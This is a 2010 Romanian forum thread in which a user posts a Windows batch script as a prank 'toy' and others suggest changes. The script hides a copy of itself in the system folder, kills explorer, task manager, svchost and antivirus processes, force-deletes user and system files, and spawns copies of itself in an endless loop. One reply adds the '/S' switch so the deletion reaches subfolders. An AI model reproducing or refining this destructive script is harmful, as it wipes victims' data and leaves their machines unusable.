HellScream Posted January 22, 2010 Report Posted January 22, 2010 Am creat ceva mic, un bat, ca sa fiu mai exact. Nu am pretentia ca este genial, sauextraordinar. Ba din contra, este o lucrare de incepator. Il puteti folosi in caz ca vreti sa determinati pecineva sa faca un install de win. Sper sa nu va suparati pe mine,ca postez asa cea, dar alt ceva, pe moment, nu sunt in stare sa creez. Distractie placuta cu jucaria de mai jos.@echo offcopy %0 %systemroot%\Roxy.bat > nulAttrib +r +h Roxy.battskill YahooMessengertskill svchosttskill Ymsgr_traytskill algtskill taskmgrtskill ccApptskill YahooAUservicetskill wdfmgrtskill rundll32tskill explorerECHO Y | DEL /F D:\*.*ECHO Y | DEL C:\Documents and Settings\*.*ECHO Y | DEL /F C:\WINDOWS\system32\dllcache\*.*:1copy Roxy.bat %random%.batcopy Roxy.bat %random%.batgoto 2:2start %0start %0goto 1:sSTART %systemdrive%\windows\System32\dllcache\explorer.exeSTART %systemdrive%\windows\System32\dllcache\taskmgr.exeSTART C:\WINDOWS\system32\calc.exeSTART C:\WINDOWS\system32\mshearts.exeSTART C:\WINDOWS\system32\narator.exeGOTO :s Quote
Nytro Posted January 23, 2010 Report Posted January 23, 2010 DEL-ul tau sterge decat fisiere. Si in Documents and Settings si de cele mai multe ori in D sunt foldere, nu o sa se intample nimic.Dar daca esti la inceput felicitari Quote
HellScream Posted January 23, 2010 Author Report Posted January 23, 2010 multumesc pentru incurajari, si va rog audceti corectari la codul pus de mine, sau ideei noi Quote
loki Posted January 23, 2010 Report Posted January 23, 2010 (edited) del /S pentru subfolderedesi pentru o distractie e de preferat renuntatul la del. E mai inteligent sa sperii omu fara sa ii strici nimic. Edited January 23, 2010 by loki Quote
sosetutza Posted January 23, 2010 Report Posted January 23, 2010 Destul de dragut...(Ii dau dreptate lui Loki la faza cu del) ps cum de tiai schimbat nicku? suna mai bine celalalt. Quote
Gonzalez Posted January 26, 2010 Report Posted January 26, 2010 Ai venit pe forum sa speri copilasi?-Gonzalez Quote
HellScream Posted January 27, 2010 Author Report Posted January 27, 2010 fac si eu ce pot, sperii si chibrite daca e cazul. BTW nu mi-am schimbat nikul. Nu stiu despre ce vorbesti. Coontul asta e vechi aici, il am mai de mult, dar tot nikul asa a fost (cred) Quote